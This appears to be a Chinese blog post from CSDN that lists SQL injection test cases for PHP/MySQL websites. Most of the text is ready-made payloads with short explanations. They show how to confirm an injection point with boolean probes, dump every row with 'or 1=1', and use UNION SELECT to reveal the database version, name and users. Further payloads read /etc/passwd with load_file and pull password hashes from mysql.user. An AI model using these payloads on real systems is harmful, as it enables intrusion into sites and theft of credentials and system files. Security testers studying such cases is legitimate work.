关闭

PHP+MySQL 网站 SQL 注入攻击测试用例

505人阅读 评论(0) 收藏 举报
分类:

SQL注入攻击测试用例

说明

Night
Night’ and 1=1#
Night’ and 1=2#

判断注入点。第一次是正常请求,如果存在注入漏洞,那么第二次请求得到结果应该与第一次一样,并且第三次请求得到的结果应该与前两次不同

Night’ or 1=1#

返回所有数据,常用于有搜索功能的页面

Night’ union select version()#

返回数据库版本信息

Night’ union select database()#

返回当前的库名

Night’ union select user()#

返回数据库的用户名信息

Night’ union select session_user()#

Night’ union select system_user()#

Night’ union select load_file(‘/etc/passwd’)#

读取系统文件

Night’ select user ,password from mysql.user#

返回数据库用户的密码信息,密码一般以MD5的方式存放


0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:5122次
    • 积分:130
    • 等级:
    • 排名:千里之外
    • 原创:8篇
    • 转载:1篇
    • 译文:0篇
    • 评论:0条
    文章分类
    文章存档